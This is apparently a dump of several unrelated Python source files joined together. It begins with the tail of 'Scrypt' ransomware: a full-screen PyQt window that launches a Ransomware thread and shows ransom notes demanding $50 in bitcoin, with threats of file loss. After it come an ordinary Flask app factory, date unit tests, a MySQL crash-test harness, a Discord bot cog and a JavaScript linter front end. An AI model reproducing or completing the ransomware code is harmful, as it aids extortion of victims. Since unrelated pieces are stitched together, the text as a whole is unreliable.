return ''.join(random.choice(password_characters) for i in range(stringLength))
def rID(self, stringLength):
password_characters = string.ascii_letters + string.digits
return ''.join(random.choice(password_characters) for i in range(stringLength))
class Scrypt(PyQt5.QtWidgets.QMainWindow):
def __init__(self):
super().__init__()
self.threadpool = PyQt5.QtCore.QThreadPool()
self.initUI()
self.banner()
self.cont()
self.readMe()
self.show()
self.threadpool.start(Ransomware())
def initUI(self):
self.setWindowFlags(PyQt5.QtCore.Qt.WindowCloseButtonHint | PyQt5.QtCore.Qt.WindowType_Mask)
self.showFullScreen()
self.banner()
self.setStyleSheet("""
QMainWindow{
background-color: #212121;
}
""")
def cont(self):
btn = PyQt5.QtWidgets.QPushButton('Continue', self)
btn.resize(750,50)
btn.move((self.frameGeometry().width())/3.35, 900)
btn.setStyleSheet("""
QPushButton{
background-color: #d50000;
border-radius: 7.5px;
font-weight: 1200;
font-size: 18px;
}
QPushButton::hover {
background-color: #9b0000;
}
""")
btn.show()
btn.clicked.connect(self.hide)
def readMe(self):
rm = PyQt5.QtWidgets.QLabel(ransomNote, self)
rm.setStyleSheet("""
QLabel{
background-color: #d50000;
color: #000000;
border: 2px solid #ff5131;
border-radius: 7.5px;
font-weight: 1200;
font-size: 18px;
}
""")
rm.resize(750,650)
rm.move(self.frameGeometry().width()/3.35, 220)
rm.setAlignment(PyQt5.QtCore.Qt.AlignCenter)
rm.show()
def banner(self):
flair = PyQt5.QtWidgets.QLabel('Scrypt', self)
flair.setStyleSheet("""
QLabel{
background-color: #d50000;
color: #000000;
border: 2px solid #ff5131;
border-radius: 7.5px;
font-weight: 1400;
font-size: 45px;
}
""")
flair.resize(800,130)
flair.move(self.frameGeometry().width()/3.5, 50)
flair.setAlignment(PyQt5.QtCore.Qt.AlignCenter)
flair.show()
@PyQt5.QtCore.pyqtSlot()
def hide(self):
self.setWindowOpacity(0)
detailedNote =f"""
-------------------------------------------------------------------------------------------------------------------------
Hello,\n
If you are reading this then you have likely been hit by Scrypt Ransomware\n
We apologize for the incovience, at the end of the day we just want to get paid\n
In order to receive the decrypter you must follow the following steps to truely recover\n
all your files.\n
1. Download BitPay: https://bitpay.com/wallet/ if you are using a different wallet thats fine.\n
2. Send $50 to this address: {btcAdd}\n
3. After sending it wait for a confirmation and send us an email and include your UniqueID: {Ransomware().randomId}\n
4. Wait shortly, you will receive an email with your decrypter once everything is handled.\n
5. If we do not receive payment within 2 weeks we will no longer be handeling support.
-------------------------------------------------------------------------------------------------------------------------
"""
ransomNote = f"""
All Your Files Have Been Encrypted\n
At the end of the day we just want to get paid\n
Here are the instructions to get getting your files back\n
1. Pay $50 btc to the listed address\n
2. Send an email and include your unique id\n
3. Wait\n
------------------------------------\n
Check your desktop for readme.txt if you are lost!\n
------------------------------------\n
BTC Address: {btcAdd}\n
Email: {email}\n
UniqueID: {Ransomware().randomId}\n
------------------------------------\n
Click the Button Below To Continue:
(Killing this program will result in a full lose of files)\n
"""
if __name__ == "__main__":
app = PyQt5.QtWidgets.QApplication(sys.argv)
l = Scrypt()
sys.exit(app.exec())
| 8,408 | 3,828 |
import os
from flask import Blueprint, Flask
def create_app(opts = {}):
app = Flask(__name__)
# We will learn how to store our secrets properly in a few short weeks.
# In the meantime, we'll use this:
app.config['SECRET_KEY'] = os.getenv('SECRET_KEY') or "Don't ever store secrets in your actual code"
# For local debugging purposes. Not ideal for production environements:
app.config['TEMPLATES_AUTO_RELOAD'] = True
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0
from .simple_photo_processor import spp as spp_blueprint
app.register_blueprint(spp_blueprint)
return app | 611 | 200 |
from datetime import datetime
from unittest import TestCase
from dateutil.tz import UTC
from src.DateUtils import get_start_of_year, get_start_of_year_after, date_to_string, date_and_time_to_string
class TestDateUtils(TestCase):
def test_get_start_of_year(self):
self.assertEqual(datetime(2018, 1, 1, 0, 0, 0, 0, tzinfo=UTC), get_start_of_year(2018))
def test_get_start_of_year_after(self):
self.assertEqual(datetime(2019, 1, 1, 0, 0, 0, 0, tzinfo=UTC), get_start_of_year_after(2018))
def test_date_to_string(self):
self.assertEqual("01.01.2018", date_to_string(datetime(2018, 1, 1, 0, 0, 0, 0, tzinfo=UTC)))
def test_date_and_time_to_string(self):
self.assertEqual("01.01.2018 00:00:00 UTC",
date_and_time_to_string(datetime(2018, 1, 1, 0, 0, 0, 0, tzinfo=UTC)))
| 845 | 371 |
import cStringIO
import hashlib
import MySQLdb
import os
import random
import signal
import sys
import threading
import time
import string
import traceback
CHARS = string.letters + string.digits
def sha1(x):
return hashlib.sha1(str(x)).hexdigest()
# Should be deterministic given an idx
def get_msg(do_blob, idx):
random.seed(idx);
if do_blob:
blob_length = random.randint(1, 24000)
else:
blob_length = random.randint(1, 255)
if random.randint(1, 2) == 1:
# blob that cannot be compressed (well, compresses to 85% of original size)
return ''.join([random.choice(CHARS) for x in xrange(blob_length)])
else:
# blob that can be compressed
return random.choice(CHARS) * blob_length
class ValidateError(Exception):
"""Raised when validate_msg fails."""
pass
class ChecksumError(Exception):
"""Raised when the ChecksumWorker finds a discrepancy."""
pass
# Base class for worker threads
class WorkerThread(threading.Thread):
global LG_TMP_DIR
def __init__(self, base_log_name):
threading.Thread.__init__(self)
self.log = open('/%s/%s.log' % (LG_TMP_DIR, base_log_name), 'a')
self.exception = None
def run(self):
try:
self.runme()
print >> self.log, "ok"
except Exception, e:
self.exception = traceback.format_exc()
print >> self.log, "\n%s\n" % self.exception
finally:
self.finish()
class PopulateWorker(WorkerThread):
def __init__(self, con, start_id, end_id, i, document_table):
WorkerThread.__init__(self, 'populate-%d' % i)
self.con = con
con.autocommit(False)
self.num = i
self.start_id = start_id
self.end_id = end_id
self.document_table = document_table
self.start_time = time.time()
self.start()
def finish(self):
print >> self.log, "total time: %.2f s" % (time.time() - self.start_time)
self.log.close()
self.con.commit()
self.con.close()
def runme(self):
print >> self.log, "populate thread-%d started" % self.num
cur = self.con.cursor()
stmt = None
for i in xrange(self.start_id, self.end_id):
msg = get_msg(do_blob, i)
stmt = get_insert(msg, i+1, self.document_table)
cur.execute(stmt)
if i % 100 == 0:
self.con.commit()
def populate_table(con, num_records_before, do_blob, log, document_table):
con.autocommit(False)
cur = con.cursor()
stmt = None
workers = []
N = num_records_before / 10
start_id = 0
for i in xrange(10):
w = PopulateWorker(MySQLdb.connect(user=user, host=host, port=port, db=db),
start_id, start_id + N, i, document_table)
start_id += N
workers.append(w)
for i in xrange(start_id, num_records_before):
msg = get_msg(do_blob, i)
# print >> log, "length is %d, complen is %d" % (len(msg), len(zlib.compress(msg, 6)))
stmt = get_insert(msg, i+1, document_table)
cur.execute(stmt)
con.commit()
for w in workers:
w.join()
if w.exception:
print >>log, "populater thead %d threw an exception" % w.num
return False
return True
def get_update(msg, idx, document_table):
if document_table:
return """
UPDATE t1 SET doc = '{"msg_prefix" : "%s", "msg" : "%s", "msg_length" : %d,
"msg_checksum" : "%s"}' WHERE id=%d""" % (msg[0:255], msg, len(msg), sha1(msg), idx)
else:
return """
UPDATE t1 SET msg_prefix='%s',msg='%s',msg_length=%d,
msg_checksum='%s' WHERE id=%d """ % (msg[0:255], msg, len(msg), sha1(msg), idx)
def get_insert_on_dup(msg, idx, document_table):
if document_table:
return """
INSERT INTO t1 (id, doc) VALUES
(%d, '{"msg_prefix" : "%s", "msg": "%s", "msg_length" : %d,
"msg_checksum" : "%s"}')
ON DUPLICATE KEY UPDATE
id=VALUES(id),
doc=VALUES(doc)
""" % (idx, msg[0:255], msg, len(msg), sha1(msg))
else:
return """
INSERT INTO t1 (msg_prefix,msg,msg_length,msg_checksum,id)
VALUES ('%s','%s',%d,'%s',%d)
ON DUPLICATE KEY UPDATE
msg_prefix=VALUES(msg_prefix),
msg=VALUES(msg),
msg_length=VALUES(msg_length),
msg_checksum=VALUES(msg_checksum),
id=VALUES(id)""" % (msg[0:255], msg, len(msg), sha1(msg), idx)
def get_insert(msg, idx, document_table):
if document_table:
return """
INSERT INTO t1 (id, doc) VALUES
(%d, '{"msg_prefix" : "%s", "msg": "%s", "msg_length" : %d,
"msg_checksum" : "%s"}')
""" % (idx, msg[0:255], msg, len(msg), sha1(msg))
else:
return """
INSERT INTO t1(id,msg_prefix,msg,msg_length,msg_checksum)
VALUES (%d,'%s','%s',%d,'%s')
""" % (idx, msg[0:255], msg, len(msg), sha1(msg))
def get_insert_null(msg, document_table):
if document_table:
return """
INSERT INTO t1 (id, doc) VALUES
(NULL, '{"msg_prefix" : "%s", "msg": "%s", "msg_length" : %d,
"msg_checksum" : "%s"}')
""" % (msg[0:255], msg, len(msg), sha1(msg))
else:
return """
INSERT INTO t1 (msg_prefix,msg,msg_length,msg_checksum,id) VALUES
('%s','%s',%d,'%s',NULL)
""" % (msg[0:255], msg, len(msg), sha1(msg))
class ChecksumWorker(WorkerThread):
def __init__(self, con, checksum):
WorkerThread.__init__(self, 'worker-checksum')
self.con = con
con.autocommit(False)
self.checksum = checksum
print >> self.log, "given checksum=%d" % checksum
self.start()
def finish(self):
print >> self.log, "total time: %.2f s" % (time.time() - self.start_time)
self.log.close()
self.con.close()
def runme(self):
print >> self.log, "checksum thread started"
self.start_time = time.time()
cur = self.con.cursor()
cur.execute("SET SESSION innodb_lra_size=16")
cur.execute("CHECKSUM TABLE t1")
checksum = cur.fetchone()[1]
self.con.commit()
if checksum != self.checksum:
errmsg = ("checksums do not match. given checksum=%d, "
"calculated checksum=%d" % (self.checksum, checksum))
print >> self.log, errmsg
raise ChecksumError(errmsg)
else:
print >> self.log, "checksums match! (both are %d)" % checksum
class Worker(WorkerThread):
def __init__(self, num_xactions, xid, con, server_pid, do_blob, max_id,
fake_changes, secondary_checks, document_table):
WorkerThread.__init__(self, 'worker%02d' % xid)
self.do_blob = do_blob
self.xid = xid
con.autocommit(False)
self.con = con
self.num_xactions = num_xactions
cur = self.con.cursor()
self.rand = random.Random()
self.rand.seed(xid * server_pid)
self.loop_num = 0
self.max_id = max_id
self.num_primary_select = 0
self.num_secondary_select = 0
self.num_secondary_only_select = 0
self.num_inserts = 0
self.num_deletes = 0
self.num_updates = 0
self.time_spent = 0
if fake_changes:
cur.execute("SET innodb_fake_changes=1")
self.secondary_checks = secondary_checks
self.document_table = document_table
self.start()
def finish(self):
print >> self.log, "loop_num:%d, total time: %.2f s" % (
self.loop_num, time.time() - self.start_time + self.time_spent)
print >> self.log, "num_primary_select=%d,num_secondary_select=%d,num_secondary_only_select=%d" %\
(self.num_primary_select, self.num_secondary_select, self.num_secondary_only_select)
print >> self.log, "num_inserts=%d,num_updates=%d,num_deletes=%d,time_spent=%d" %\
(self.num_inserts, self.num_updates, self.num_deletes, self.time_spent)
self.log.close()
def validate_msg(self, msg_prefix, msg, msg_length, msg_checksum, idx):
prefix_match = msg_prefix == msg[0:255]
checksum = sha1(msg)
checksum_match = checksum == msg_checksum
len_match = len(msg) == msg_length
if not prefix_match or not checksum_match or not len_match:
errmsg = "id(%d), length(%s,%d,%d), checksum(%s,%s,%s) prefix(%s,%s,%s)" % (
idx,
len_match, len(msg), msg_length,
checksum_match, checksum, msg_checksum,
prefix_match, msg_prefix, msg[0:255])
print >> self.log, errmsg
raise ValidateError(errmsg)
else:
print >> self.log, "Validated for length(%d) and id(%d)" % (msg_length, idx)
# Check to see if the idx is in the first column of res_array
def check_exists(self, res_array, idx):
for res in res_array:
if res[0] == idx:
return True
return False
def runme(self):
self.start_time = time.time()
cur = self.con.cursor()
print >> self.log, "thread %d started, run from %d to %d" % (
self.xid, self.loop_num, self.num_xactions)
while self.loop_num < self.num_xactions:
idx = self.rand.randint(0, self.max_id)
insert_or_update = self.rand.randint(0, 3)
self.loop_num += 1
try:
stmt = None
# Randomly toggle innodb_prefix_index_cluster_optimization 5%
# of the time
if self.rand.randint(0, 20) == 0:
cur.execute("SET GLOBAL innodb_prefix_index_cluster_optimization="
"1-@@innodb_prefix_index_cluster_optimization")
# Randomly change the value of innodb_zlib_wrap 2.77% of the time
if self.rand.randint(0, 36) == 0:
cur.execute("SET GLOBAL innodb_zlib_wrap=1-@@innodb_zlib_wrap");
msg = get_msg(self.do_blob, idx)
# Query primary key 70%, secondary key lookup 20%, secondary key only 10%
r = self.rand.randint(1, 10)
if r <= 7:
if self.document_table:
cur.execute("SELECT doc.msg_prefix,doc.msg,doc.msg_length, "
"doc.msg_checksum FROM t1 WHERE id=%d" % idx)
else:
cur.execute("SELECT msg_prefix,msg,msg_length,msg_checksum FROM t1 WHERE id=%d" % idx)
res = cur.fetchone()
self.num_primary_select += 1
elif r <= 9:
if self.document_table:
cur.execute("SELECT doc.msg_prefix,doc.msg,doc.msg_length, "
"doc.msg_checksum FROM t1 use document keys WHERE doc.msg_prefix='%s'"
% msg[0:255])
else:
cur.execute("SELECT msg_prefix,msg,msg_length,msg_checksum FROM t1 WHERE msg_prefix='%s'" % msg[0:255])
res = cur.fetchone()
self.num_secondary_select += 1
# Query only the secondary index
else:
if self.document_table:
cur.execute("SELECT id, doc.msg_prefix FROM t1 use document keys "
"WHERE doc.msg_prefix='%s'" % msg[0:255])
else:
cur.execute("SELECT id, msg_prefix FROM t1 WHERE "
"msg_prefix='%s'" % msg[0:255])
res = cur.fetchall()
self.num_secondary_only_select += 1
# Don't validate if r > 9 because we don't have sufficient columns.
if r <= 9 and res:
self.validate_msg(res[0], res[1], int(res[2]), res[3], idx)
insert_with_index = False
if insert_or_update:
if res:
if self.rand.randint(0, 1):
stmt = get_update(msg, idx, self.document_table)
else:
stmt = get_insert_on_dup(msg, idx, self.document_table)
insert_with_index = True
self.num_updates += 1
else:
r = self.rand.randint(0, 2)
if r == 0:
stmt = get_insert(msg, idx, self.document_table)
insert_with_index = True
elif r == 1:
stmt = get_insert_on_dup(msg, idx, self.document_table)
insert_with_index = True
else:
stmt = get_insert_null(msg, self.document_table)
self.num_inserts += 1
else:
stmt = "DELETE FROM t1 WHERE id=%d" % idx
self.num_deletes += 1
query_result = cur.execute(stmt)
# 10% probability of checking to see the key exists in secondary index
if self.secondary_checks and self.rand.randint(1, 10) == 1:
if self.document_table:
cur.execute("SELECT id, doc.msg_prefix FROM t1 use document keys WHERE "
"doc.msg_prefix='%s'" % msg[0:255])
else:
cur.execute("SELECT id, msg_prefix FROM t1 WHERE msg_prefix='%s'" % msg[0:255])
res_array = cur.fetchall()
if insert_or_update:
if insert_with_index:
if not self.check_exists(res_array, idx):
print >> self.log, "Error: Inserted row doesn't exist in secondary index"
raise Exception("Error: Inserted row doesn't exist in secondary index")
else:
if self.check_exists(res_array, idx):
print >> self.log, "Error: Deleted row still exists in secondary index"
raise Exception("Error: Deleted row still exists in secondary index")
if (self.loop_num % 100) == 0:
print >> self.log, "Thread %d loop_num %d: result %d: %s" % (self.xid,
self.loop_num, query_result,
stmt)
# 30% commit, 10% rollback, 60% don't end the trx
r = self.rand.randint(1,10)
if r < 4:
self.con.commit()
elif r == 4:
self.con.rollback()
except MySQLdb.Error, e:
if e.args[0] == 2006 or e.args[0] == 2013:
print >> self.log, "mysqld down, transaction %d" % self.xid
return
else:
print >> self.log, "mysql error for stmt(%s) %s" % (stmt, e)
try:
self.con.commit()
except Exception, e:
print >> self.log, "commit error %s" % e
class DefragmentWorker(WorkerThread):
def __init__(self, con):
WorkerThread.__init__(self, 'worker-defragment')
self.num_defragment = 0
self.con = con
self.con.autocommit(True)
self.start_time = time.time()
self.daemon = True
self.stopped = False
self.start()
def stop(self):
self.stopped = True
def finish(self):
print >> self.log, "defragment ran %d times" % self.num_defragment
print >> self.log, "total time: %.2f s" % (time.time() - self.start_time)
self.log.close()
self.con.close()
def runme(self):
print >> self.log, "defragmentation thread started"
cur = self.con.cursor()
while not self.stopped:
try:
print >> self.log, "Starting defrag."
cur.execute("ALTER TABLE t1 DEFRAGMENT")
print >> self.log, "Defrag completed successfully."
self.num_defragment += 1
time.sleep(random.randint(0, 10))
except MySQLdb.Error, e:
# Handle crash tests that kill the server while defragment runs.
if e.args[0] == 2006 or e.args[0] == 2013:
print >> self.log, "Server crashed while defrag was running."
else:
raise e
if __name__ == '__main__':
global LG_TMP_DIR
pid_file = sys.argv[1]
kill_db_after = int(sys.argv[2])
num_records_before = int(sys.argv[3])
num_workers = int(sys.argv[4])
num_xactions_per_worker = int(sys.argv[5])
user = sys.argv[6]
host = sys.argv[7]
port = int(sys.argv[8])
db = sys.argv[9]
do_blob = int(sys.argv[10])
max_id = int(sys.argv[11])
LG_TMP_DIR = sys.argv[12]
fake_changes = int(sys.argv[13])
checksum = int(sys.argv[14])
secondary_checks = int(sys.argv[15])
no_defrag = int(sys.argv[16])
document_table = int(sys.argv[17])
checksum_worker = None
defrag_worker = None
workers = []
server_pid = int(open(pid_file).read())
log = open('/%s/main.log' % LG_TMP_DIR, 'a')
# print "kill_db_after = ",kill_db_after," num_records_before = ", \
#num_records_before, " num_workers= ",num_workers, "num_xactions_per_worker =",\
#num_xactions_per_worker, "user = ",user, "host =", host,"port = ",port,\
#" db = ", db, " server_pid = ", server_pid
if num_records_before:
print >> log, "populate table do_blob is %d" % do_blob
con = None
retry = 3
while not con and retry > 0:
con = MySQLdb.connect(user=user, host=host, port=port, db=db)
retry = retry - 1
if not con:
print >> log, "Cannot connect to MySQL after 3 attempts."
sys.exit(1)
if not populate_table(con, num_records_before, do_blob, log,
document_table):
sys.exit(1)
con.close()
if checksum:
print >> log, "start the checksum thread"
con = MySQLdb.connect(user=user, host=host, port=port, db=db)
if not con:
print >> log, "Cannot connect to MySQL server"
sys.exit(1)
checksum_worker = ChecksumWorker(con, checksum)
workers.append(checksum_worker)
print >> log, "start %d threads" % num_workers
for i in xrange(num_workers):
worker = Worker(num_xactions_per_worker, i,
MySQLdb.connect(user=user, host=host, port=port, db=db),
server_pid, do_blob, max_id, fake_changes, secondary_checks,
document_table)
workers.append(worker)
if no_defrag == 0:
defrag_worker = DefragmentWorker(MySQLdb.connect(user=user, host=host,
port=port, db=db))
if kill_db_after:
print >> log, "kill mysqld"
time.sleep(kill_db_after)
os.kill(server_pid, signal.SIGKILL)
worker_failed = False
print >> log, "wait for threads"
for w in workers:
w.join()
if w.exception:
print "Worker hit an exception:\n%s\n" % w.exception
worker_failed = True
if defrag_worker:
defrag_worker.stop()
defrag_worker.join()
if defrag_worker.exception:
print ("Defrag worker hit an exception:\n%s\n." %
defrag_worker.exception)
worker_failed = True
if checksum_worker:
checksum_worker.join()
if checksum_worker.exception:
print ("Checksum worker hit an exception:\n%s\n." %
checksum_worker.exception)
worker_failed = True
if worker_failed:
sys.exit(1)
print >> log, "all threads done"
| 18,260 | 6,325 |
from configparser import ConfigParser
from glob import glob
from discord import Embed
from discord.ext.commands import Cog, command, group, is_owner
import asyncio
import datetime
import sys
import discord
from discord.ext.commands.context import Context
#from tinker.ext.apps import *
class Counter(discord.ui.View):
# Define the actual button
# When pressed, this increments the number displayed until it hits 5.
# When it hits 5, the counter button is disabled and it turns green.
# note: The name of the function does not matter to the library
@discord.ui.button(label='0', style=discord.ButtonStyle.red)
async def count(self, button: discord.ui.Button, interaction: discord.Interaction):
number = int(button.label) if button.label else 0
if number + 1 <= 5:
button.style = discord.ButtonStyle.green
button.disabled = True
button.label = str(number + 1)
# Make sure to update the message with our updated selves
await interaction.response.edit_message(view=self)
# Define a View that will give us our own personal counter button
class admin_slash(Cog):
def __init__(self, client):
self.client = client
# Define a simple View that gives us a counter button
class EphemeralCounter(discord.ui.View):
# When this button is pressed, it will respond with a Counter view that will
# give the button presser their own personal button they can press 5 times.
@discord.ui.button(label='Click', style=discord.ButtonStyle.blurple)
async def receive(self, button: discord.ui.Button, interaction: discord.Interaction):
# ephemeral=True makes the message hidden from everyone except the button presser
await interaction.response.send_message('Enjoy!', view=Counter(), ephemeral=True)
@command()
async def counter(self, ctx: Context):
"""Starts a counter for pressing."""
await ctx.send('Press!', view=self.EphemeralCounter())
| 2,037 | 557 |
#!/usr/bin/env python
# Copyright 2018 The JsCodeStyle Authors.
# Copyright 2007 The Closure Linter Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Checks JavaScript files for common style guide violations.
gjslint.py is designed to be used as a PRESUBMIT script to check for javascript
style guide violations. As of now, it checks for the following violations:
* Missing and extra spaces
* Lines longer than 80 characters
* Missing newline at end of file
* Missing semicolon after function declaration
* Valid JsDoc including parameter matching
Someday it will validate to the best of its ability against the entirety of the
JavaScript style guide.
This file is a front end that parses arguments and flags. The core of the code
is in tokenizer.py and checker.py.
"""
from __future__ import print_function
import argparse
import sys
import time
import os
import glob
import re
import multiprocessing
import errno
from itertools import tee
from functools import partial
from jscodestyle.errorrecord import check_path, fix_path
from jscodestyle.error_check import STRICT_DOC, JSLINT_ERROR_DOC
from jscodestyle.error_fixer import ErrorFixer
GJSLINT_ONLY_FLAGS = ['--unix_mode', '--beep', '--nobeep', '--time',
'--check_html', '--summary', '--quiet']
# Comment - Below are all the arguments from gjslint. There are way
# too many, we should think what is really useful and cull some.
# Perhaps we should rely more on a config file for advance setups
class JsCodeStyle(object):
"""This class is a front end that parses arguments and flags."""
def __init__(self):
parser = argparse.ArgumentParser()
parser.add_argument(
'paths',
help='the files to check',
type=str,
nargs='*',
default=sys.stdin)
parser.add_argument(
'-u', '--unix_mode',
help='emit warnings in standard unix format e.g. for Emacs',
action='store_true')
parser.add_argument(
'-b', '--beep',
help='do not beep when errors are found',
action='store_false')
parser.add_argument(
'-t', '--time',
help='emit timing statistics',
action='store_true')
parser.add_argument(
'-c', '--check_html',
help='check javascript in html files',
action='store_true')
parser.add_argument(
'-s', '--summary',
help='show an error count summary',
action='store_true')
parser.add_argument(
'-q', '--quiet',
help=('minimize logged messages. '
'Most useful for per-file linting, such as that '
'performed by the presubmit linter service.'),
action='store_true')
parser.add_argument(
'-p', '--singleprocess',
help=('disable parallelised linting using the '
'multiprocessing module; this may make debugging easier.'),
action='store_true')
parser.add_argument(
'-a', '--additional_extensions',
help=('Additional file extensions (not js) that should '
'be treated as JavaScript files e.g. es, es6 or ts.'),
metavar='ext',
nargs='+')
parser.add_argument(
'-r', '--recurse',
help=('recurse in to the subdirectories of the given path'),
action='append',
nargs='+',
metavar='dir')
parser.add_argument(
'-e', '--exclude_directories',
help=('exclude the specified directories '
'(only applicable along with -r'),
type=str,
action='append',
nargs='+',
metavar='dir')
parser.add_argument(
'-x', '--exclude_files',
type=str,
nargs='*',
help='exclude the specified files',
action='append',
metavar='file')
parser.add_argument(
'--limited_doc_files',
help=('List of files with relaxed documentation checks. Will not '
'report errors for missing documentation, some missing '
'descriptions, or methods whose @return tags don\'t have a '
'matching return statement.'),
action='append',
nargs='*',
metavar="filename")
parser.add_argument(
'--error_trace',
help='show error exceptions.',
action='store_true')
parser.add_argument(
'--closurized_namespaces',
help=('namespace prefixes, used for testing of'
'goog.provide/require'),
action='append',
nargs='*',
metavar="prefix")
parser.add_argument(
'--ignored_extra_namespaces',
help=('Fully qualified namespaces that should be not be reported '
'as extra by the linter.'),
action='append',
nargs='*',
metavar="namespace")
parser.add_argument(
'--custom_jsdoc_tags',
help=('extra jsdoc tags to allow'),
action='append',
nargs='*',
metavar="tagname")
parser.add_argument(
'--dot_on_next_line',
help=('Require dots to be'
'placed on the next line for wrapped expressions'),
action='store_true')
parser.add_argument(
'--check_trailing_comma',
help=('check trailing commas '
'(ES3, not needed from ES5 onwards)'),
action='store_true')
parser.add_argument(
'--debug_indentation',
help='print debugging information for indentation',
action='store_true')
# Comment - watch this one, backwards internally than before
parser.add_argument(
'--jsdoc',
help='disable reporting errors for missing JsDoc.',
action='store_true')
# Comment - this should change to named errors
parser.add_argument(
'--disable',
help=('Disable specific error. Usage Ex.: gjslint --disable 1 '
'0011 foo.js.'),
action='append',
nargs='*',
metavar='error_num')
# Comment - old version checked for minimum of N=1,
# so maybe check for negative later
parser.add_argument(
'--max_line_length',
type=int,
help=('Maximum line length allowed '
'without warning (default 80).'),
metavar='N',
default=80)
parser.add_argument(
'--strict',
help=STRICT_DOC,
action='store_true')
parser.add_argument(
'--jslint_error',
help=JSLINT_ERROR_DOC,
action='append',
nargs='+')
parser.add_argument(
'--dry_run',
help='(fixjscodestyle) do not modify the file, only print it.',
action='store_true')
parser.add_argument(
'--disable_indentation_fixing',
help='(fixjscodestyle) disable automatic fixing of indentation.',
action='store_true')
parser.add_argument(
'--fix_error_codes',
help=('(fixjscodestyle) list of specific error codes to '
'fix. Defaults to all supported error codes when empty. '
'See errors.py for a list of error codes.'),
action='append',
nargs='+',
metavar='error_num')
self.args = parser.parse_args()
# Emacs sets the environment variable INSIDE_EMACS in the subshell.
# Request Unix mode as emacs will expect output to be in Unix format
# for integration.
# See https://www.gnu.org/software/emacs/manual/html_node/emacs/
# Interactive-Shell.html
if 'INSIDE_EMACS' in os.environ:
self.args.unix_mode = True
self.suffixes = ['.js']
if self.args.additional_extensions:
self.suffixes += ['.%s' % ext for ext in self.args.additional_extensions]
if self.args.check_html:
self.suffixes += ['.html', '.htm']
self.paths = None
self._get_paths()
self.start_time = time.time()
def matches_suffixes(self, filename):
"""Returns whether the given filename matches one of the given suffixes.
Args:
filename: Filename to check.
Returns:
Whether the given filename matches one of the given suffixes.
"""
suffix = filename[filename.rfind('.'):]
return suffix in self.suffixes
def get_user_specified_files(self):
"""Returns files to be linted, specified directly on the command line.
Can handle the '*' wildcard in filenames, but no other wildcards.
Args:
argv: Sequence of command line arguments. The second and following arguments
are assumed to be files that should be linted.
suffixes: Expected suffixes for the file type being checked.
Returns:
A sequence of files to be linted.
"""
all_files = []
lint_files = []
# Perform any necessary globs.
for filename in self.args.paths:
if filename.find('*') != -1:
for result in glob.glob(filename):
all_files.append(result)
else:
all_files.append(filename)
for filename in all_files:
if self.matches_suffixes(filename):
lint_files.append(filename)
return lint_files
def get_recursive_files(self):
"""Returns files to be checked specified by the --recurse flag.
Returns:
A list of files to be checked.
"""
lint_files = []
# Perform any request recursion
if self.args.recurse:
for start in self.args.recurse:
for root, _, files in os.walk(start):
for filename in files:
if self.matches_suffixes(filename):
lint_files.append(os.path.join(root, filename))
return lint_files
def filter_files(self, files):
"""Filters the list of files to be linted be removing any excluded files.
Filters out files excluded using --exclude_files and --exclude_directories.
Args:
files: Sequence of files that needs filtering.
Returns:
Filtered list of files to be linted.
"""
num_files = len(files)
ignore_dirs_regexs = []
excluded_dirs = (self.args.exclude_directories if
self.args.exclude_directories else [])
excluded_files = (self.args.exclude_files if
self.args.exclude_files else [])
for ignore in excluded_dirs:
ignore_dirs_regexs.append(re.compile(r'(^|[\\/])%s[\\/]' % ignore))
result_files = []
for filename in files:
add_file = True
for exclude in excluded_files:
if filename.endswith('/' + exclude) or filename == exclude:
add_file = False
break
for ignore in ignore_dirs_regexs:
if ignore.search(filename):
# Break out of ignore loop so we don't add to
# filtered files.
break
if add_file:
# Convert everything to absolute paths so we can easily remove duplicates
# using a set.
result_files.append(os.path.abspath(filename))
skipped = num_files - len(result_files)
if skipped:
print('Skipping %d file(s).' % skipped)
self.paths = set(result_files)
def _get_paths(self):
"""Finds all files specified by the user on the commandline."""
files = self.get_user_specified_files()
if self.args.recurse:
files += self.get_recursive_files()
self.filter_files(files)
def _multiprocess_check_paths(self, check_fn):
"""Run _check_path over mutltiple processes.
Tokenization, passes, and checks are expensive operations. Running in a
single process, they can only run on one CPU/core. Instead,
shard out linting over all CPUs with multiprocessing to parallelize.
Args:
paths: paths to check.
Yields:
errorrecord.ErrorRecords for any found errors.
"""
pool = multiprocessing.Pool()
path_results = pool.imap(check_fn, self.paths)
for results in path_results:
for result in results:
yield result
# Force destruct before returning, as this can sometimes raise spurious
# "interrupted system call" (EINTR), which we can ignore.
try:
pool.close()
pool.join()
del pool
except OSError as err:
if err.errno is not errno.EINTR:
raise err
def _check_paths(self, check_fn):
"""Run _check_path on all paths in one thread.
Args:
paths: paths to check.
Yields:
errorrecord.ErrorRecords for any found errors.
"""
for path in self.paths:
results = check_fn(path)
for record in results:
yield record
def _print_file_summary(self, records):
"""Print a detailed summary of the number of errors in each file."""
paths = list(self.paths)
paths.sort()
for path in paths:
path_errors = [e for e in records if e.path == path]
print('%s: %d' % (path, len(path_errors)))
@staticmethod
def _print_file_separator(path):
print('----- FILE : %s -----' % path)
def _print_error_records(self, error_records):
"""Print error records strings in the expected format."""
current_path = None
for record in error_records:
if current_path != record.path:
current_path = record.path
if not self.args.unix_mode:
self._print_file_separator(current_path)
print(record.error_string)
def _print_summary(self, paths, error_records):
"""Print a summary of the number of errors and files."""
error_count = len(error_records)
all_paths = set(paths)
all_paths_count = len(all_paths)
if error_count is 0:
print ('%d files checked, no errors found.' % all_paths_count)
new_error_count = len([e for e in error_records if e.new_error])
error_paths = set([e.path for e in error_records])
error_paths_count = len(error_paths)
no_error_paths_count = all_paths_count - error_paths_count
if (error_count or new_error_count) and not self.args.quiet:
error_noun = 'error' if error_count == 1 else 'errors'
new_error_noun = 'error' if new_error_count == 1 else 'errors'
error_file_noun = 'file' if error_paths_count == 1 else 'files'
ok_file_noun = 'file' if no_error_paths_count == 1 else 'files'
print('Found %d %s, including %d new %s, in %d %s (%d %s OK).' %
(error_count,
error_noun,
new_error_count,
new_error_noun,
error_paths_count,
error_file_noun,
no_error_paths_count,
ok_file_noun))
@staticmethod
def _format_time(duration):
"""Formats a duration as a human-readable string.
Args:
duration: A duration in seconds.
Returns:
A formatted duration string.
"""
if duration < 1:
return '%dms' % round(duration * 1000)
